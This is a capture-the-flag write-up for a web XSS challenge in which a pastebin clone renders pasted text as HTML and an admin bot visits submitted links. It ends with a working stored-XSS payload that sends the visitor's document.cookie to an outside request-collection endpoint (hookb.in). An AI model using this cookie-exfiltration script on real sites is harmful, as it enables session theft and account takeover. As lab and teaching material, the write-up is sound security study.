Tags: web xss
Rating:
This challenge is a simple XSS exploit. The website that's vulnerable is
supposed to be a clone of pastebin. I can enter any text into the paste area,
and it will get inserted as HTML code into the website when someone visits the
generated link.
The challenge has two sites: one with the pastebin clone, and one that visits
any pastebin url as the website administrator. The goal of this challenge is
given by it's description:
> Ah, the classic pastebin. Can you get the admin's cookies?
In JS, you can read all cookies without the `HttpOnly` attribute by reading
`document.cookie`. This allows us to read the cookies from the admin's browser,
but now we have to figure out a way to get them sent back to us.
Luckily, there's a free service called [hookbin](https://hookbin.com/) that
gives you an http endpoint to send anything to, and look at the request
details.
Combining these two a simple paste can be created:
```html
<script>
var post = new XMLHttpRequest();
post.open("post", "https://hookb.in/<endpoint url>");
post.send(document.cookie);
</script>
```
